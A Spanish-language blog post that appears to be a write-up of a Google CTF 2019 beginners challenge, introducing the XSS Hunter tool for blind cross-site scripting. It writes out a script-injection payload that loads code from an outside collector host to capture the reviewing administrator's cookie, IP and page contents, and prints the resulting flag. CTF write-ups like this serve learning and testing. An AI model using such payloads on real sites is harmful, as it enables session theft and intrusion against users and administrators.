4 jul 2019

Realizando blind XSS con XSS Hunter (Beginners - Google CTF 2019)

Buenas a todos, en el día de hoy quería compartir con vosotros la aplicación XSS Hunter, de @IAmMandatory, una herramienta pensada para poder ser instalada en cualquier servidor y realizar pruebas XSS de una forma más sencilla.

En concreto, en este post cubriremos la instancia que el propio desarrollador nos ofrece para hacer una serie de pruebas en uno de los retos propuestos en el beginners de Google de este año, a modo de prueba de concepto. ¡Así que comencemos!

¿Qué es blind XSS?

Blind XSS es una variante de las vulnerabilidades conocidas como XSS persistentes. Ocurren cuando la entrada de datos del atacante es guardada en el servidor para posteriormente ser mostrada en otra parte de la aplicación.

¿Cómo utilizo XSS Hunter?

XSS Hunter es totalmente gratuito y solo necesitamos registrarnos en su web para poder empezar a utilizarlo. Si solo lo utilizamos de manera puntual en un CTF, lo más interesante sería utilizar un mail temporal que podamos desechar con facilidad; en caso de querer integrarlo en un pentest, quizás nos interese lanzar nuestra propia instancia, tal y como nos explica el propio autor.

 

¿Ministry of Agriculture? ¿Coliflores?

Google nos plantea que nuestras amigas las coliflores han sido raptadas para ser devoradas por una clase de seres con aspecto humanoide, y que debemos acercarnos a ellos para poder rescatarlas. Para ello, debemos acceder como administrador del sitio. Se nos adjunta la siguiente instancia: https://govagriculture.web.ctfcompetition.com/



Al intentar mandar nuestro nuevo post, recibimos la siguiente repuesta: Your post was submitted for review. Administator will take a look shortly. Por lo tanto, sí hay "alguien" revisando nuestros post,s y nos encontramos ante un escenario de un posible bXSS (qué sorpresa 😜).

Rescatando a nuestra amiga la coliflor

XSS Hunter cuenta con una serie de payloads predefinidos para poder lanzarlos sin tener que construirlos, aunque es posible que a veces tengamos que modificarlos o adaptarlos a nuestro uso. De igual modo cuenta con alertas mail en caso de que intentemos utilizar la herramienta en un formulario de preguntas, de manera que si un administrador tarda tiempo en leer nuestra pregunta se nos avise cuando lo haga.



Nuestro post ahora será "><script src=https://icetormzero.xss.ht></script> y esperaremos pacientemente que sea revisado por parte del administrador. Una vez que el administrador revise nuestro post, en la pestaña de XSS Fires se nos avisará, al igual que por mail si lo tenemos activado.



Si viésemos el informe completo, podríamos ver una miniatura de la web que ve el administrador del sitio cuando abre nuestro post, así como su IP, Cookies, User Agent y una vista previa del DOM de la web. Además de ello se podrían añadir una serie de configuraciones extra o modificar las existentes, pero en este caso solo queremos hacernos con la Cookie del administrador que en este caso sería nuestra flag CTF{8aaa2f34b392b415601804c2f5f0f24e}


Una vez conseguido esto estamos un tanto más cerca de rescatar a nuestra amiga la coliflor 😜

Espero que os haya gustado y os haya parecido interesante esta herramienta para investigar fácilmente si un XSS está siendo lanzado desde el lado de administración, ya sea en un CTF o en otro ámbito 😉

¡Saludos!

No hay comentarios:

Publicar un comentario